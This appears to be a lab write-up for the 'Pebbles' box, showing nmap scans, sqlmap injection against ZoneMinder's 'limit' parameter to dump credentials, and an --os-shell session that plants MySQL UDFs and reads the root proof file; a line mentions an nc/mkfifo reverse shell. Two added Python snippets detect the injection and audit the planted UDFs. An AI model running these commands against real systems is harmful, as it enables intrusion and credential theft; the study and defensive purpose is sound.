Pebbles

Intro

Initial Foothold

Full TCP Port Scan

# Nmap 7.94SVN scan initiated Fri Apr 12 09:23:41 2024 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/joe/hax/pg/results/pebbles.pg/scans/_full_tcp_nmap.txt -oX /home/joe/hax/pg/results/pebbles.pg/scans/xml/_full_tcp_nmap.xml pebbles.pg
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds.  Ignoring time.
Nmap scan report for pebbles.pg (192.168.247.52)
Host is up, received user-set (0.040s latency).
Scanned at 2024-04-12 09:23:42 CDT for 113s
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 61 vsftpd 3.0.3
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
|   256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
|   256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp   open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
3305/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-favicon: Apache Tomcat
|_http-title: Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.11 - 4.1 (88%), Linux 4.4 (88%), Linux 3.2.0 (85%), Linux 3.16 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=4/12%OT=21%CT=%CU=%PV=Y%DS=4%DC=T%G=N%TM=6619445F%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10C%TI=Z%TS=8)
OPS(O1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=M551ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M551NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 0.005 days (since Fri Apr 12 09:19:05 2024)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   39.62 ms 192.168.45.1
2   39.54 ms 192.168.45.254
3   39.88 ms 192.168.251.1
4   39.80 ms pebbles.pg (192.168.247.52)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 12 09:25:35 2024 -- 1 IP address (1 host up) scanned in 114.29 seconds

Open Ports

  • 21/tcp - vsftpd 3.0.3

  • 22/tcp - OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

  • 80/tcp - Apache httpd 2.4.18 ((Ubuntu))

  • 3305/tcp - Apache httpd 2.4.18 ((Ubuntu))

  • 8080/tcp - Apache httpd 2.4.18 ((Ubuntu))

Testing 21/tcp

No anonymous logon available

Credentials admin/admin did not result in access

Testing 22/tcp

No brute forcing performed yet

Testing 80/tcp

Login form was available on landing page

Login form not vulnerable to SQLi up to Level/Risk 2 via sqlmap

Found interesting directory - zm (ZoneMinder application)

Testing 8080/tcp

No login page observed

Found interesting directory - zm (ZoneMinder application)

Testing 3305/tcp

No login page observed

Found interesting directory - zm (ZoneMinder application)

Performed SQLi on ZoneMinder 1.29.0

sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' -D 'zm' -T 'Users' -C Username,Password --dump
...
[10:12:07] [INFO] cracked password 'admin' for user 'admin'                                                                                      
Database: zm                                                                                                                                     
Table: Users
[1 entry]
+----------+---------------------------------------------------+
| Username | Password                                          |
+----------+---------------------------------------------------+
| admin    | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |
+----------+---------------------------------------------------+
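The injection above rides on the `limit` parameter of ZoneMinder's log-query request, which sqlmap exploited with a stacked query. The following is an added example (not code from the writeup or from ZoneMinder) showing the defender's two halves: a hardened parser that only ever admits a bounded integer, and a classifier that flags request bodies carrying the stacked-query or UNION shapes sqlmap reported. The parameter names match the page; the sample bodies are constructed.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Constructed sample POST bodies modelled on the ZoneMinder request used above.
# The second carries the exact payload sqlmap reported for the 'limit' parameter.
SAMPLE_BODIES = [
    "view=request&request=log&task=query&limit=100",
    "view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#",
    "view=request&request=log&task=query&limit=100 UNION SELECT 1,2--",
    "view=request&request=log&task=query&limit=abc",
]

# A statement terminator followed by a SQL verb, a UNION, or a MySQL comment
# marker can never be part of a legitimate integer LIMIT value.
STACKED = re.compile(
    r";\s*(select|insert|update|delete|drop)\b|\bunion\b|#|--", re.I)


def validate_limit(raw: str, max_rows: int = 1000) -> Optional[int]:
    """Hardened parsing: accept only a bare, bounded, non-negative integer.
    Anything else is rejected before it can reach the SQL string."""
    if not re.fullmatch(r"\d{1,6}", raw):
        return None
    value = int(raw)
    return value if value <= max_rows else None


def classify_body(body: str) -> str:
    """Return 'ok', 'invalid' or 'injection' for one URL-encoded POST body."""
    params = parse_qs(body, keep_blank_values=True)
    raw = params.get("limit", [""])[0]
    if validate_limit(raw) is not None:
        return "ok"
    return "injection" if STACKED.search(raw) else "invalid"


def scan_bodies(bodies: List[str]) -> List[Tuple[str, str]]:
    """Classify a batch of bodies, e.g. replayed from a request log."""
    return [(b, classify_body(b)) for b in bodies]


if __name__ == "__main__":
    for body, verdict in scan_bodies(SAMPLE_BODIES):
        print(f"{verdict:9s} {body}")
```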

Attempting --os-shell option in sqlmap

sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' --os-shell                  
        ___                                                                                                                                       
       __H__                                                                                                                                      
 ___ ___["]_____ ___ ___  {1.8.3#stable}                                                                                                          
|_ -| . [)]     | .'| . |                                                                                                                         
|___|_  [']_|_|_|__,|  _|                                                                                                                         
      |_|V...       |_|   https://sqlmap.org                                                                                                      
                                                                                                                                                  
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                  
[*] starting @ 11:05:08 /2024-04-12/                                                                                                              
                                                                                                                                                  
[11:05:08] [INFO] resuming back-end DBMS 'mysql'                                                                                                  
[11:05:08] [INFO] testing connection to the target URL                                                                                            
you have not declared cookie(s), while server wants to set its own ('ZMSESSID=muf90i9ed6t...1llf5i72a1;zmSkin=classic;zmCSS=classic'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:                                                                              
---                                                                                                                                               
Parameter: limit (POST)                                                                                                                           
    Type: stacked queries                                                                                                                         
    Title: MySQL >= 5.0.12 stacked queries (comment)                                                                                              
    Payload: view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#                                                                       
---                                                                                                                                               
[11:05:10] [INFO] the back-end DBMS is MySQL                                                                                                      
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)                                                                      
web application technology: Apache 2.4.18                                                                                                         
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)                                                                                                     
[11:05:10] [INFO] fingerprinting the back-end DBMS operating system                                                                               
[11:05:10] [INFO] the back-end DBMS operating system is Linux                                                                                     
[11:05:10] [INFO] testing if current user is DBA   
[11:05:10] [INFO] fetching current user
[11:05:10] [INFO] resumed: root@localhost
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[11:05:15] [INFO] checking if UDF 'sys_exec' already exist
[11:05:15] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                   
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] y
[11:05:29] [INFO] checking if UDF 'sys_eval' already exist
[11:05:29] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[11:05:29] [INFO] detecting back-end DBMS version from its banner
[11:05:29] [INFO] resumed: 5.7.30-0ubuntu0.16.04.1
[11:05:29] [INFO] retrieving MySQL plugin directory absolute path
[11:05:29] [INFO] resumed: /usr/lib/mysql/plugin/
[11:05:32] [INFO] retrieved: 
[11:05:42] [INFO] adjusting time delay to 1 second due to good response times
8040
[11:05:50] [INFO] the local file '/tmp/sqlmapsu8jrs7w61063/lib_mysqludf_sysjm3mu5i0.so' and the remote file '/usr/lib/mysql/plugin/libsbtnb.so' have the same size (8040 B)
[11:05:50] [INFO] creating UDF 'sys_exec' from the binary UDF file
[11:05:50] [INFO] creating UDF 'sys_eval' from the binary UDF file
[11:05:50] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[11:05:50] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:03] [INFO] retrieved: root
command standard output: 'root'
os-shell> cat /root/proof.txt
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:33] [INFO] retrieved: 7574772785970f747047e659aa85b43a
command standard output: '7574772785970f747047e659aa85b43a'

To catch a reverse shell, run an nc/mkfifo reverse shell command through sqlmap's --os-shell.
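The --os-shell session above shows what sqlmap leaves behind on the database server: a library written into the MySQL plugin directory and the UDFs sys_exec and sys_eval registered against it, all possible because the web application connected as root@localhost. As an added example (not code from the writeup or from sqlmap), this audit flags those artefacts given the rows of `SELECT name, dl FROM mysql.func` and a listing of the directory reported by `SHOW VARIABLES LIKE 'plugin_dir'`; the sample rows are constructed from the session above.

```python
from typing import Dict, List, Set, Tuple

# UDF names exported by lib_mysqludf_sys, the library sqlmap's --os-shell
# installs (sys_exec and sys_eval appear in the session above). Any of them
# registered in mysql.func lets SQL run OS commands as the mysqld user.
SHELL_UDFS = {"sys_exec", "sys_eval", "sys_get", "sys_set"}


def audit_udfs(func_rows: List[Tuple[str, str]], plugin_files: List[str],
               approved_libs: Set[str]) -> Dict[str, List[str]]:
    """func_rows: (name, dl) pairs from `SELECT name, dl FROM mysql.func`.
    plugin_files: file basenames found in plugin_dir.
    approved_libs: shared objects shipped by the distribution's packages."""
    findings: Dict[str, List[str]] = {
        "shell_udf": [], "unapproved_udf": [], "unapproved_plugin_file": []}
    for name, dl in func_rows:
        if name.lower() in SHELL_UDFS:
            findings["shell_udf"].append(f"{name} ({dl})")
        elif dl not in approved_libs:
            findings["unapproved_udf"].append(f"{name} ({dl})")
    for fname in plugin_files:
        # A .so that no package owns is how the UDF code reached the host
        # (written there via SQL, which is why plugin_dir must not be
        # writable by the mysqld user and secure_file_priv should be set).
        if fname.endswith(".so") and fname not in approved_libs:
            findings["unapproved_plugin_file"].append(fname)
    return findings


def has_findings(findings: Dict[str, List[str]]) -> bool:
    return any(findings.values())


# Constructed sample: the two UDFs created in the session above, the random
# library name sqlmap chose there, and one harmless distribution plugin.
SAMPLE_FUNC_ROWS = [("sys_exec", "libsbtnb.so"), ("sys_eval", "libsbtnb.so")]
SAMPLE_PLUGIN_FILES = ["auth_socket.so", "libsbtnb.so"]
APPROVED = {"auth_socket.so"}

if __name__ == "__main__":
    result = audit_udfs(SAMPLE_FUNC_ROWS, SAMPLE_PLUGIN_FILES, APPROVED)
    for kind, items in result.items():
        for item in items:
            print(f"{kind}: {item}")
```

The same audit applies to a clean host: an empty mysql.func and a plugin directory containing only packaged libraries yields no findings.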

Privilege Escalation

No privilege escalation required